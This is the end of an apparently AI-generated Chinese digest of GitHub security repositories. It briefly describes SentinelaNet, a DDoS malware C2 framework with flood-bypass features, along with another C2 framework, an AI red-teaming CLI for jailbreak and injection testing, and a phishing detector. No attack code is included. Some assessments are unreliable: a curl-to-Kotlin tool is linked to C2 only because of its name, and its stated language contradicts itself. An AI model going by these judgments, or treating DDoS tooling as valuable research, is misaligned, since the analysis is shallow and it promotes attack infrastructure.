| 1 | SentinelaNet是一个Python编写的C2框架,用于管理恶意软件以执行DDoS攻击。 |
|
|||
|
|
| 2 | 更新增加了UDP Flood Bypass功能。 |
|
|||
|
|
| 3 | 移除了Roblox UDP Flood功能,更新了CNC和Payload。 |
|
|||
|
|
| 4 | 提供了多种DDoS攻击方法,如UDP, TCP, SYN和HEX Flood。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> C2框架使用Python实现,通过命令控制恶意软件进行DDoS攻击。
|
|||
|
|
|
|||
|
|
> 更新增加了.UDPB命令,实现了UDP Flood绕过机制,增强了攻击效果。
|
|||
|
|
|
|||
|
|
> 更新Payload增加了浏览器攻击。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Malware
|
|||
|
|
• CNC Server
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
增加了绕过机制,提高了攻击的有效性和隐蔽性。更新也表明框架活跃更新。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Python-C2 - Python实现的C2框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Python-C2](https://github.com/letigredununavu/Python-C2) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个使用Python实现的C2(Command and Control)框架,名为SANDWORM C2。README文件展示了如何创建HTTPS证书并运行C2。当前版本已经实现了基础的C2功能,并且未来计划加入文件传输和HTTPS支持。更新内容是README文档的更新,增加了运行C2的说明。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Python实现的C2框架 |
|
|||
|
|
| 2 | 支持HTTPS |
|
|||
|
|
| 3 | 包含基本的C2功能 |
|
|||
|
|
| 4 | 与关键词C2高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用Python实现
|
|||
|
|
|
|||
|
|
> 支持HTTPS加密通信
|
|||
|
|
|
|||
|
|
> 可能包含命令执行和数据传输等功能
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Python
|
|||
|
|
• HTTPS
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接与C2这一关键词相关,是一个用于红队和紫队演练的C2框架,具有较高的安全研究价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### c2k - curl命令转Kotlin代码工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [c2k](https://github.com/Stexxe/c2k) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增功能` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **8**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库名为c2k,主要功能是将curl命令转换为kotlin代码。主要包含cmd、internal/app、internal/app/kotlin、internal/app/curl四个目录。主要功能是解析curl命令,生成对应的kotlin代码,可以进行简单的GET请求转换。这次更新添加了e2e测试,实现基本GET请求。由于该项目可以将curl命令转换为kotlin代码,并且项目名称包含c2,与C2框架的构建具有潜在关联,因此具有一定的研究价值。更新还包括了kotlin代码的序列化和diff功能。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 将curl命令转换为kotlin代码 |
|
|||
|
|
| 2 | 使用Kotlin编写,可能用于C2框架的构建 |
|
|||
|
|
| 3 | 包含基本的GET请求转换功能 |
|
|||
|
|
| 4 | 与C2关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用go语言编写
|
|||
|
|
|
|||
|
|
> 解析curl命令
|
|||
|
|
|
|||
|
|
> 生成Kotlin AST
|
|||
|
|
|
|||
|
|
> 序列化Kotlin代码
|
|||
|
|
|
|||
|
|
> 包含diff功能,用于代码比较
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• curl
|
|||
|
|
• kotlin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目与C2关键词高度相关,功能是将curl命令转换为kotlin代码。kotlin可能被用于构建C2框架,因此具有一定的研究价值和潜在的应用价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### cli - AI模型安全测试CLI工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [cli](https://github.com/Mindgard/cli) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全工具/安全研究` |
|
|||
|
|
| 更新类型 | `新增功能` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个命令行工具(CLI),用于测试AI模型的安全性。主要功能包括:自动化红队测试、漏洞检测、安全风险评估等。 它支持多种攻击手段,如越狱、注入等,并与Mindgard平台集成,方便用户进行威胁分析和安全管理。本次更新增加了允许从输出中过滤模型输入的功能,增强了测试的灵活性。 该仓库与AI安全关键词高度相关,解决了AI模型安全方面的实际问题,具有一定的研究和实用价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供针对AI模型的自动化安全测试框架 |
|
|||
|
|
| 2 | 支持多种AI攻击,如越狱、注入等 |
|
|||
|
|
| 3 | 与Mindgard平台集成,便于威胁分析和修复 |
|
|||
|
|
| 4 | 新增功能:允许从输出中过滤模型输入,增强测试灵活性 |
|
|||
|
|
| 5 | 高度关联AI安全关键词,解决实际AI安全问题 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用Python编写,基于requests和jsonpath_ng库实现
|
|||
|
|
|
|||
|
|
> 提供`test`, `login`, `validate` 等命令
|
|||
|
|
|
|||
|
|
> 使用JSON Selector从API响应中提取信息
|
|||
|
|
|
|||
|
|
> 更新引入jsonpath_ng.ext扩展,允许基于jsonpath的过滤操作
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Mindgard CLI
|
|||
|
|
• AI 模型
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接针对AI模型安全问题,提供了测试和评估工具,与搜索关键词(AI+Security)高度相关。新增功能提高了测试的灵活性。虽然没有直接的漏洞利用代码,但其自动化测试能力对安全研究和实践有重要意义。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### ai_phishing - AI-Driven Phishing Detector
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [ai_phishing](https://github.com/Venky1209/ai_phishing) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `Security Tool` |
|
|||
|
|
| 更新类型 | `New Project` |
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
This repository hosts a phishing detection website. It leverages AI to analyze both URLs and text content to assess their security. Given the focus on AI and security, this project demonstrates a practical application of AI in cybersecurity, making it relevant to the search query.
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | AI-powered phishing detection |
|
|||
|
|
| 2 | URL and content analysis for security |
|
|||
|
|
| 3 | Potential for novel phishing detection techniques |
|
|||
|
|
| 4 | Strong relevance to AI + Security keyword search |
|
|||
|
|
| 5 | Provides practical application of AI in cybersecurity |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Utilizes AI for URL and content analysis.
|
|||
|
|
|
|||
|
|
> Likely employs machine learning models for phishing detection.
|
|||
|
|
|
|||
|
|
> May involve feature extraction from URLs and text.
|
|||
|
|
|
|||
|
|
> Could incorporate natural language processing (NLP) for content analysis.
|
|||
|
|
|
|||
|
|
> The repository's functionality depends on the specific AI implementation.
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Web Application
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
The project directly addresses the search query 'AI+Security' by implementing AI for phishing detection. The combination of URL and content analysis provides a practical approach to a common security problem. Although the project is new and has minimal metrics (stars, forks), the concept is valuable.
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
|
|||
|
|
## 免责声明
|
|||
|
|
本文内容由 AI 自动生成,仅供参考和学习交流。文章中的观点和建议不代表作者立场,使用本文信息需自行承担风险和责任。
|